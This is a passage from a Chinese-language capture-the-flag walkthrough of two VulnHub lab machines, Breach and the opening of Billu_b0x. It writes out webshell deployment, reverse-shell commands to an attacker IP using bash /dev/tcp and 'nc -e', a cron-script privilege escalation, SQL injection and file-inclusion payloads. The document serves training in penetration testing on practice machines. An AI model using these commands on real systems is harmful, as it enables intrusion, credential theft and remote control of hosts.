src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 點擊initech.html左邊的<code>Employee portal</code>進入到<code>http://192.168.110.140/impresscms/user.php</code> 這是一個impresscms登陸頁</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用以前兩次base64解碼獲得的密碼登陸impresscms：</p><p>用戶名：<code>pgibbons</code></p><p>密碼：<code>damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) exploit-db.com查找impress cms漏洞：發現ImpressCMS 1.3.9 SQL注入漏洞：<code>https://www.exploit-db.com/exploits/39737/</code>，可注入頁面爲<code>/modules/profile/admin/field.php</code>，可是該頁面目前沒有權限訪問，沒法進行注入。</p><p>(4) 注意左邊的收件箱Inbox顯示有3封郵件，依次打開看：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>第1封郵件，主要內容：讓你的團隊只能向管理門戶發佈任何敏感的內容。個人密碼很是安全，發自ImpressCMS Admin Bill。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/9.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第2封郵件，主要內容：Michael採購了IDS/IPS。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/10.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第3封郵件，主要內容：有一個peter的SSL證書被保存在192.168.110.140/.keystore。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/11.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(5) 訪問<code>http://192.168.110.140/.keystore</code>下載包含SSL證書的密鑰庫keystore文件，keystore是存儲公私密鑰的一種文件格式。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/12.jpg' alt='' referrerPolicy='no-referrer' /> </p><h3><a name='header-n7127' class='md-header-anchor '></a>0x03：導入流量抓包文件、SSL證書到Wireshark</h3><p>(1) 依次訪問左邊的菜單樹，點擊每一個菜單欄：</p><p>content連接了一張圖片troll.gif：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/13.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>點擊profile會進入目錄瀏覽：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/14.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>但都沒發現可利用漏洞，繼續瀏覽每一個網頁。</p><p>(2) 點擊<code>View Account</code>菜單進入界面，再依次點擊頁面的<code>Content</code>，會彈出一行連接<code>Content SSL implementation test capture</code>，點擊連接，以下圖：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/15.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(3) 進入<code>http://192.168.110.140/impresscms/modules/content/content.php?content_id=1</code>頁面，能夠看到一個名爲：<code>_SSL_test_phase1.pcap</code>的Wireshark流量包文件，下載它。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/16.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>同時，該頁面有重要的提示信息：這個pCAP文件是有紅色團隊的從新攻擊產生的，可是不能讀取文件。並且<code>They told me the alias, storepassword and keypassword are all set to 'tomcat'</code>別名、Keystore密碼、key密碼都設置成<code>tomcat</code>。</p><p>由此推測：a.這是一個流量包文件，不能讀取極可能由於某些流量有SSL加密（前面的郵件中提供了一個keystore，這裏提供了密碼；b.系統中可能存在tomcat。</p><p>(4) Windows攻擊機安裝有JDK，到JDK目錄下找到keytool.exe工具：路徑<code>C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>將keystore放到C盤根目錄，查看keystore這個密鑰庫裏面的全部證書，命令<code>keytool -list -keystore c:\keystore</code> 輸入密鑰庫口令tomcat：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 從密鑰庫導出.p12證書，將keystore拷貝到keytool目錄，導出名爲：tomcatkeystore.p12的證書，命令：</p><p>keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) 將.p12證書導入Wireshark</p><p>.p12證書存儲在C盤根目錄，將證書導入Wireshark：在Wireshark中打開<code>_SSL_test_phase1.pcap</code>流量包文件，選擇菜單：編輯--首選項--Protocols--SSL，點擊右邊的Edit：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p>輸入：192.168.110.140 8443 http 點擊選擇證書文件 輸入密碼tomcat</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7178' class='md-header-anchor '></a>0x04：從流量包文件中獲得tomcat後臺URL和密碼</h3><p>(1) 導入證書後，https流量已經被解密，查看每一個http流量包：</p><p>發現從192.168.110.129到192.168.110.140的攻擊流量包，其中有cmd命令馬執行了id命令，攻擊者上傳了兩張圖片，疑似圖片馬，可是命令馬沒法直接訪問，須要登陸tomcat後臺：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 得到Tomcat後臺登陸地址和用戶名密碼</p><p>繼續觀察流量包，發現一個Unauthorized的認證包，該request和response包含了Tomcat後臺的登陸地址：<code>https://192.168.110.140:8443/_M@nag3Me/html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現包含登陸用戶名密碼的數據包， 採用http basic認證，認證數據包爲：<code>Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這是base64編碼的用戶名密碼，將<code>dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code>複製到Burpsuit Decoder進行解碼，獲得Tomcat登陸用戶名密碼</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Tomcat後臺登陸用戶名：tomcat，密碼：Tt\5D8F(#!*u=G)4m7zB</p><h2><a name='header-n7201' class='md-header-anchor '></a>獲取shell</h2><h3><a name='header-n7202' class='md-header-anchor '></a>0x05： 登陸Tomcat後臺get shell</h3><p>(1) 登陸tomcat後臺：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Tomcat後臺get shell是有標準姿式的，上養馬場，準備好jsp版本的各類馬，這裏有cmd命令小馬，菜刀馬，jspspy大馬，將其打成caidao.zip壓縮包，再將zip壓縮包將擴展名改成caidao.war，將war包上傳部署便可：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 在WAR file to deploy中將war包上傳：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>上傳後在目錄中找到上傳的目錄/caidao，已上傳jsp木馬文件就在這個目錄下。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 使用中國菜刀鏈接<code>https://192.168.110.140:8443/caidao/caidao.jsp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 使用菜刀命令行鏈接，執行id;pwd命令成功：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 發現的問題：上傳的菜刀馬，一下子就會消失，文件被刪除，須要從新上傳war包纔可以繼續使用菜刀，主機可能有殺軟或者殺web shell工具。解決方法：bash反彈一個shell出來。</p><h2><a name='header-n7231' class='md-header-anchor '></a>提高權限</h2><h3><a name='header-n7232' class='md-header-anchor '></a>0x06： 查看系統用戶，發現mysql root密碼</h3><p>(1) 查看當前系統用戶，找id爲1000之後的用戶 cat /etc/passwd</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現兩個值得關注的用戶：milton 和 blumbergh</p><p>(2) 在菜刀裏面找到網頁根目錄，默認是在tomcat目錄，找到網頁部署目錄<code>/var/www/5446/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 該目錄下發現兩個奇怪的php文件，命名很是長且無規律fe4db1f7bc038d60776dcb66ab3404d5.php和0d93f85c5061c44cdffeb8381b2772fd.php，使用菜刀下載下來打開查看：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這是mysql數據庫鏈接文件，使用mysql的root帳號鏈接數據庫，密碼爲空。</p><p>(4) 由於菜刀馬老是被刪除，因此反彈shell到nc：在菜刀cmd命令行反彈一個shell到Windows攻擊機的nc，命令：<code>echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc接收反彈sehll成功：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 鏈接mysql數據庫，查看mysql用戶，這裏輸入mysql命令後一直沒有回顯，直到輸入exit退出mysql登陸後，查詢回顯纔出來，命令：</p><p><code>mysql -u root -p</code></p><p><code>use mysql;</code></p><p><code>select user,password from user;</code></p><p><code>exit</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><p>獲得milton用戶的密碼哈希：<code>6450d89bd3aff1d893b85d3ad65d2ec2</code></p><p>到<code>https://www.somd5.com/</code>解密，獲得用戶milton的明文密碼：thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7275' class='md-header-anchor '></a>0x07： 提權到用戶milton和blumbergh</h3><p>(1) 沒法執行su命令，顯示須要一個終端，以前都遇到這個問題，經過Python解決：</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 提權到用戶milton</p><p><code>su - milton</code>  密碼：thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p> 查看milton用戶home目錄下的some_script.sh文件，沒有可利用的信息。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 查看系統內核版本，命令<code>uanme -a</code>和<code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/44.jpg' alt='' referrerPolicy='no-referrer' /></p><p>系統內核版本爲：Linux Breach 4.2.0-27-generic，不存在Ubuntu本地提權漏洞。存在本地提權漏洞內核版本是：Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/45.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 查看歷史命令，無有價值的線索，看到歷史命令su提權到了blumbergh用戶。須要找到blumbergh用戶的密碼。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/46.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 到如今發現了7張圖片，6張在圖片目錄：<code>http://192.168.110.140/images/</code>，1張在milton用戶目錄下：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/47.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>http://192.168.110.140/images/bill.png</code></p><p><code>http://192.168.110.140/images/initech.jpg</code></p><p><code>http://192.168.110.140/images/troll.gif</code></p><p><code>http://192.168.110.140/images/cake.jpg</code></p><p><code>http://192.168.110.140/images/swingline.jpg</code></p><p><code>http://192.168.110.140/images/milton_beach.jpg</code></p><p><code>milton用戶目錄下my_badge.jpg</code></p><p>將圖片複製到kali linux，使用strings打印各圖片其中的可打印字符，追加輸出到images.txt，在vim下查看，密碼在bill.png圖片中。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/48.jpg' alt='' referrerPolicy='no-referrer' /></p><p>找到可能的密碼或提示：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/49.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現惟一的單詞是：<code>coffeestains</code></p><p>或者使用exiftool.exe工具查看bill.png圖片的exif信息，獲得可能的密碼：<code>coffeestains</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/50.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6)提權到blumbergh用戶</p><p>用戶名：blumbergh <br/></p><p>密碼：coffeestains</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/51.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(7)查看歷史命令，發現/usr/share/cleanup和tidyup.sh腳本文件：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/52.jpg' alt='' referrerPolicy='no-referrer' /></p><p>讀取tidyup.sh腳本分析：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/53.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf</code></p><p>這是一段清理腳本，描述中說明每3分鐘執行清理，刪除webapps目錄下的文件，所以以前上傳的菜刀馬老是被刪除，須要從新上傳。</p><p>查看tidyup.sh的權限，對該腳本沒有寫入權限，只有root能夠</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/54.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看sudo權限，執行sudo -l：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/55.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現用戶可以以root權限執行這tee程序或tidyup.sh腳本：/usr/bin/tee和/usr/share/cleanup/tidyup.sh</p><p>tee命令用於讀取標準輸入的數據，並將其內容輸出成文件。tidyup.sh是清理腳本。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/56.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7370' class='md-header-anchor '></a>0x07：反彈root權限shell，獲取flag</h3><p>(1) 向tidyup.sh中寫入反彈shell命令</p><p>tidyup.sh文件只有root可寫，而可以以root權限運行tee命令，那麼用tee命令寫tidyup.sh：先將反彈shell命令寫入shell.txt文件，使用bash反彈shell命令沒有成功，因而使用nc命令反彈shell成功，因此寫nc反彈命令：</p><p><code>echo "nc -e /bin/bash 192.168.110.220 5555" > shell.txt</code></p><p>再使用tee命令將shell.txt內容輸出到tidyup.sh</p><p><code>cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh</code></p><p>查看tidyup.sh文件寫入成功：</p><p><code>cat /usr/share/cleanup/tidyup.sh</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/57.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) nc監聽等待反彈shell，查看權限是root，flag是一張圖片,將圖片拷貝到home目錄：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/58.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 查看一下crontab計劃任務，發現果真有每3分鐘執行tidyup.sh清理腳本的任務：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/59.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 使用以前上傳的jsp大馬JspSpy將flair.jpg下載到Windows：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/60.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 查看flag：<code>I NEED TO TALK ABOUT YOUR FLAIR</code> 遊戲通關。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/61.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7403' class='md-header-anchor '></a>思路總結</h2><h3><a name='header-n7404' class='md-header-anchor '></a>主要突破點</h3><p>(1) 從網頁源碼和圖片字符中解密出CMS和Tomcat的帳號、密碼。</p><p>(2) 導入ssl證書到Wireshark中解密通過SSL加密的流量，得到Tomcat後臺登陸URL和帳號密碼。</p><p>(3) Tomcat後臺get shell姿式要熟練。</p><p>(4) 提權：找到兩個帳號的密碼，發現能夠root權限執行的tee命令和tidyup.sh清理腳本，經過計劃任務反彈root shell。</p><h3><a name='header-n7413' class='md-header-anchor '></a>難點和踩到的坑</h3><p>(1) 使用keytool導出SSL證書：這是很是規滲透知識，須要查閱原理和工具使用，耗費時間較多。</p><p>(2) Tomcat後臺get shell後，已上傳的菜刀馬老是被殺，每次傳上去過不了幾分鐘沒了，當時覺得該系統安裝了殺毒軟件或web shell清理工具，實際是由於主機tidyup.sh清理腳本，每3分鐘清理一次。反彈出一個shell就能夠持續使用shell了。</p><p>(3) 鏈接mysql執行命令，沒有回顯。菜刀執行命令超時，nc中只有exit退出時纔回顯，當時打算放棄了，才exit退出，結果退出纔有回顯，發現了milton帳號的密碼哈希。山重水複疑無路，柳暗花明又一村。</p><p>(4) 花費較多時間進行兩次帳號切換，再反彈root shell提權。發現和利用tidyup.sh須要較多時間。</p><p>(5) 經過crontab的計劃任務，反彈root shell的方式,在真實滲透測試中是常見的，好比redis的root空口令挖礦，能夠ssh證書鏈接，也能夠寫root crontab反彈，可是在Vulnhub中第一次遇到，對初學者有難度。</p><h1><a name='header-n7424' class='md-header-anchor '></a>第二節 Billu_b0x</h1><h2><a name='header-n7425' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n7426' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/billu/Billu_b0x.zip' target='_blank' class='url'>https://download.vulnhub.com/billu/Billu_b0x.zip</a></p><h3><a name='header-n7429' class='md-header-anchor '></a>靶機說明</h3><p>虛擬機難度中等，使用ubuntu（32位）,其餘軟件包有： </p><ul><li>PHP</li><li>apache</li><li>MySQL</li></ul><h3><a name='header-n7442' class='md-header-anchor '></a>目標</h3><p>Boot to root：從Web應用程序進入虛擬機，並得到root權限。</p><h3><a name='header-n7445' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機：使用VMWare打開虛機，網絡鏈接方式設置爲net，靶機自動獲取IP。</li><li>攻擊機：同網段下有Windows攻擊機，安裝有Nmap、Burpsuit、Sqlmap、nc、Python2.七、DirBuster、AWVS、Nessus等滲透工具，kali攻擊機，主要用Windows攻擊機完成實驗。</li></ul><h2><a name='header-n7453' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>啓動Billu_b0x虛擬機，因爲虛機網絡設置爲net模式，使用Nmap掃描VMware Network Adapter VMnet8網卡的NAT網段C段IP，便可找到虛機IP，命令：</p><p><code>nmap -sP 192.168.64.1/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到靶機ip <code>192.168.64.161</code></p><ul><li>端口和服務識別</li></ul><p>使用nmap掃描1-65535全端口，並作服務識別和深度掃描（加-A參數），掃描結果保存到txt文件，命令：</p><p><code>nmap -p1-65535 -A 192.168.64.161 -oN billu.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現目標主機端口和服務以下：</p><p>端口         協議        後端服務</p><p>TCP 22      SSH        OpenSSH 5.9p1</p><p>TCP 80      HTTP       Apache httpd 2.2.22     <br/></p><p>進入web首頁：發現用戶名口令輸入框，並提示「Show me your SQLI skills」。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7488' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>漏洞挖掘思路：</li></ul><p>(1) SQL注入：首頁提示注入，想辦法注入成功。</p><p>(2) 暴破目錄：用DirBuster暴破，看是否有新網頁，找新漏洞；</p><p>(3) 漏洞掃描：暴破的新網頁，送進AWVS或APPScan掃漏洞；</p><p>(4) 手動挖掘：暴破的新頁面，經過Firefox掛burp代理，在burp中觀察Request和Response包，手動找漏洞；</p><p>(5) 查看每一個網頁的源碼，看是否有提示；。</p><p>(6) 如獲得用戶名，密碼，嘗試登陸ssh，如能鏈接上，無需反彈shell了。</p><ul><li>步驟1：測試首頁SQL注入</li></ul><p>(1) 在用戶名輸入框輸入<code>admin' or 'a'='a --</code> 密碼隨意，發現沒法注入，出現js彈框Try again：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 使用sqlmap進行post注入測試，命令：</p><p>sqlmap.py -u 「<a href='http://192.168.64.161' target='_blank' class='url'>http://192.168.64.161</a>」 --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>sqlmap注入檢測完成，結果沒法注入，目前不知道系統對注入的過濾規則是什麼，使用幾個sqlmap的tamper測試也未成功。暫時先不fuzz注入，看看暴破目錄。</p><ul><li>步驟2：windows使用DirBuster暴破目錄，同時使用kali Linux的dirb暴破，爲獲得更多的暴破結果，並減小暴破時間：</li></ul><p>獲得頁面較多，test.php、add.php、in.php、c.php、index.php、show.php等，目錄有：uploaded_images，phpmy依次訪問：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟3：利用文件包含漏洞獲取php源碼、passwd文件</li></ul><p>(1) 訪問test.php：頁面提示file參數爲空，須要提供file參數</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>測試文件包含：<code>http://192.168.64.161?file=/etc/passwd</code> 發現沒法包含，跳轉會首頁。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 在Firefox的Hackbar或者Brupsuit中，將get請求，變動爲post請求，文件包含成功，得到passwd文件。</p><p>使用hackerbar post數據，可下載passwd文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用burpsuit中選擇Change request method，將get請求轉換爲post請求，得到passwd文件成功：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 經過一樣文件包含的方法，下載add.php、in.php、c.php、index.php、show.php、panel.php等文件，後面能夠訪問文件的同時，審計文件的源代碼。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 查看passwd文件，發現1個id 1000的帳號ica，ssh鏈接的用戶名能夠是ica或root：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟4：訪問add.php、in.php頁面和審計代碼</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>add.php是一個上傳界面，可是功能沒法使用，查看源碼文件發現只是個頁面，沒有後臺處理代碼。in.php是php info信息。</p><ul><li>步驟5：查看c.php源碼</li></ul><p>這是數據庫鏈接文件，發現mysql鏈接用戶名密碼：</p><p>用戶名：billu</p><p>密碼：b0x_billu</p><p>數據庫名：ica_lab</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟6：經過獲得的mysql密碼登陸phpmyadmin失敗</li></ul><p>(1) 經過dirb暴破出/phpmy目錄，訪問該目錄到phpmyadmin登陸頁面：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/18.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>使用mysql密碼嘗試登陸phpmyadmin：但是沒法登陸。目前獲得一個ssh用戶是ica，mysql鏈接帳號billu和密碼b0x_billu，嘗試登陸ssh和phpmyadmin都失敗。</p><p>目前SQL注入繞過沒有成功，獲得的mysql鏈接密碼沒法登陸phpmyadmin。</p><p>初步推測虛擬機故障：mysql沒有正常啓動，稍後打算單用戶模式進入Ubuntu排查。</p><ul><li>步驟7：繼續暴破phpmy目錄，文件包含phpmyadmin配置文件</li></ul><p>(1) phpmyadmin的默認的配置文件是：config.inc.php。須要猜想路徑，經過URL猜想路徑默認在/var/www/phpmy下面。</p><p>(2) 在火狐瀏覽器的Hackbar或者Burpsuit中，經過文件包含，讀取config.inc.php文件，Hackbar的獲取方法：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/19.jpg' alt='' referrerPolicy='no-referrer' /> </p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/20.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>在配置文件中發現root密碼：roottoor</p><p>(3) Burpsuit的獲取方法：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/21.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步驟8：使用xshell ssh登陸root帳號，完成實驗</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/22.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步驟9：排查mysql故障</li></ul><p>至此已經得到root權限，可是以前的phpmyadmin沒法登陸問題，懷疑mysql故障，root登陸後，查看mysql狀態爲：mysql stop/waiting，推測mysql被以前的高線程目錄暴破、掃描致使故障，嘗試重啓mysql失敗，決定從新安裝虛擬機。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/23.jpg' alt='' referrerPolicy='no-referrer' /> 